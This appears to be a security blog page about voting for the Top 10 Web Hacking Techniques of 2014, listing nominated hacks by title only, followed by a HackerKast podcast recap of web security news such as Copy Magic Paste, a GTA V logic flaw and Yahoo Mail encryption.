Each verified attack technique will be added to a survey which will be linked below on Feb 2. The survey will remain open until Feb 20. Each attack technique (listed alphabetically) receives points depending on how high the entry is ranked in each ballot. For example, an entry in position #1 will be given 15 points, position #2 will get 14 points, position #3 gets 13 points, and so on down to 1 point. At the end all points from all ballots will be tabulated to ascertain the top 15 overall.
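The scoring above is a simple positional (Borda-style) count, which can be sketched in a few lines; the ballots below are hypothetical and truncated to three entries:

```javascript
// Sketch of the ballot tabulation: position #1 earns 15 points,
// position #2 earns 14, and so on down each ballot.
function tabulate(ballots, slots = 15) {
  const totals = {};
  for (const ballot of ballots) {
    ballot.forEach((entry, position) => {
      totals[entry] = (totals[entry] || 0) + (slots - position);
    });
  }
  // Highest point total first.
  return Object.entries(totals).sort((a, b) => b[1] - a[1]);
}

// Two hypothetical ballots:
const standings = tabulate([
  ["Heartbleed", "ShellShock", "Poodle"],
  ["Heartbleed", "ShellShock", "Poodle"],
]);
// → [["Heartbleed", 30], ["ShellShock", 28], ["Poodle", 26]]
```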

Click here to vote for your favorite web hacks of the year! ***CLOSED***

Phase 3: Panel of Security Experts Voting [Feb 23-Mar 19]

From the result of the open community voting, the final 15 Web Hacking Techniques will be ranked based on votes by a panel of security experts. (Panel to be announced soon!) Using the exact same voting process as Phase 2, the judges will rank the final 15 based on novelty, impact, and overall pervasiveness. Once tabulation is completed, we’ll have the Top 10 Web Hacking Techniques of 2014!

Prizes [to be announced]

The winner of this year’s top 10 will receive a prize!

Ongoing List of 2014 Hacks (in no particular order)
TweetDeck XSS
OpenSSL CVE-2014-0224
Rosetta Flash
Unauthenticated Backup and Password Disclosure In HandsomeWeb SOS Webpages cve-2014-3445
CTA: The weaknesses in client side xss filtering targeting Chrome’s XSS Auditor
Advanced Exploitation of Mozilla Firefox Use-After-Free Vulnerability (Pwn2Own 2014) CVE-2014-1512
Facebook hosted DDOS with notes app
The Web Never Forgets: Persistent Tracking Mechanisms in the Wild
Remote File Upload Vulnerability in WordPress MailPoet Plugin (wysija-newsletters)
The PayPal 2FA Bypass
AIR Flash RCE from PWN2OWN
PXSS on long length videos to DOS
MSIE Flash 0day targeting french aerospace
Linksys E420 Authentication Bypass Disclosure
Paypal Manager Account Hijack
Covert Redirect Vulnerability Related to OAuth 2.0 and OpenID
How I hacked Instagram to see your private photos
How I hacked GitHub again
Residential Gateway “Misfortune Cookie”
Recursive DNS Resolver (DOS)
Belkin Buffer Overflow via Web
Google User De-Anonymization
Soaksoak WordPress Malware
Hacking PayPal Accounts with 1 Click
Same Origin Bypass in Adobe Reader CVE-2014-8453
HikaShop Object Injection
Covert Timing Channels based on HTTP Cache Headers
Bypassing NoCAPTCHA
Delta Boarding Pass Spoofing
Cryptophp Backdoor
Microsoft SChannel Vulnerability
Google Two-Factor Authentication Bypass
Drupal 7 Core SQLi
Apache Struts ClassLoader Manipulation Remote Code Execution and Blog Post
Reflected File Download
Misfortune Cookie – TR-069 ACS Vulnerabilities in residential gateway routers
Hostile Subdomain Takeover using Heroku/Github/Desk + more: Example 1 and Example 2
File Name Enumeration in Rails
Canadian Beacon
setTimeout Clickjacking


Final 15 (in no particular order):
AIR Flash RCE from PWN2OWN
Belkin Buffer Overflow via Web
Apache Struts ClassLoader Manipulation Remote Code Execution and Blog Post
Advanced Exploitation of Mozilla Firefox Use-After-Free Vulnerability (Pwn2Own 2014) CVE-2014-1512
Covert Timing Channels based on HTTP Cache Headers
Canadian Beacon
Cryptophp Backdoor
Hacking PayPal Accounts with 1 Click
Google Two-Factor Authentication Bypass
Facebook hosted DDOS with notes app
Rosetta Flash
Residential Gateway “Misfortune Cookie”

#HackerKast 27: SXSW, Copy Magic Paste, Tinder AI, GTA V, Mystery SSL Fix

Hey everybody! Quick recap this week as we are gearing up for the Top 10 Web Hacks Webinar (Which you can register to watch here)

Robert and I just got back from SXSW this weekend and that was a very interesting experience. My first big trade show floor that wasn’t security related. Tons of interesting stuff floating around Austin this week!

The first story we covered was a Copy Magic Paste trick that Robert found via the SEO crowd. The idea started as a way for websites to force citation when people steal content, but Robert talked about the possibility of using it to sneak JavaScript into places.

Next, I touched on a fun Tinder story from SXSW, where a movie about AI used a robot Tinder profile to match with people at the conference; after a short conversation, the bot would point the person it tricked towards an Instagram account promoting the movie. This brought up a lot of AI topics floating around the conference, about which Robert has a ton to say.

A quick, fun logic flaw in GTA V wound up having some real-money consequences. Jer and I love logic flaws; they feel like hacking without hacking. This one was pretty simple: make an in-game car for a few thousand in-game dollars and sell it for about 10x that. The writers of the article converted this into real-world money, and it seemed people could make about $5 every 20 minutes. If it could be automated, it would’ve been some nice passive income.

Jer talked about an exciting new story that we are all very hopeful about: Yahoo Mail end-to-end encryption. Alex Stamos, CISO over at Yahoo, announced a new program to use end-to-end encryption in their webmail client. The big question here is how usable it will be. If it is only as usable as PGP, we probably won’t see a huge uptick in adoption. We’ll be watching this closely, as it has huge potential.

Lastly, we touched on a “mystery” SSL fix from the OpenSSL community. A mailing-list announcement mentioned new version patches coming out that fix a high-severity vulnerability. We don’t have much detail yet, but once we do, it will be pretty interesting. In the wake of Heartbleed, we are all a bit nervous whenever OpenSSL is mentioned in the context of vulnerabilities.

Thanks for listening! Check us out on iTunes if you want an audio only version to your phone. Subscribe Here
Join the conversation over on Twitter at #HackerKast
or write us directly @jeremiahg, @rsnake, @mattjay

Copy Magic Paste Modifies Copy Event on your Website
Tinder Users at SXSW Are Falling For a Robot
Grand Theft Auto Logic Flaw Leads To Real Money
User-Focused Security: End-to-End Encryption Extension for Yahoo Mail
New Mystery SSL Fix To Be Released Thursday

Notable stories this week that didn’t make the cut:
Strange snafu hijacks UK nuke maker’s traffic, routes it through Ukraine
Microsoft Is Killing off the Internet Explorer Brand (now called Spartan)
Chromium to Block RFC1918 (Probably)